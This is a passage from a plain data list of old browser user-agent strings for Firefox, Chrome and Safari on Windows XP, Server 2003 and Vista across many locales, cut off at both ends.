Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB6 -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.652.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.462.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.463.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre -Mozilla/5.0 (Windows; U; Windows NT 5.2; eu) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.0.04506.648) -Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.2) Gecko/20091111 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.2) Gecko/20100101 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.0 (x86_64); de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 6.0; bg; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ca; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) FirePHP/0.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.31 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.42 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.46 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.160.0 Safari/530.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.162.0 Safari/530.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.164.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.168.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.171.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.23 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.0 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.220.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.0 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.224.2 Safari/532.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.241.0 Safari/532.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.127 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.8 (KHTML, like Gecko) Chrome/7.0.521.0 Safari/534.8 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.7.13) Gecko/20050610 K-Meleon/0.9 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.5.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.21022; .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729) FirePHP/0.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b2) Gecko/20081127 Firefox/3.1b1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b3) Gecko/20090405 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.8) Gecko/20100722 BTRS86393 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-gb) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.2) Gecko/20100115 Firefox/3.6 ( .NET CLR 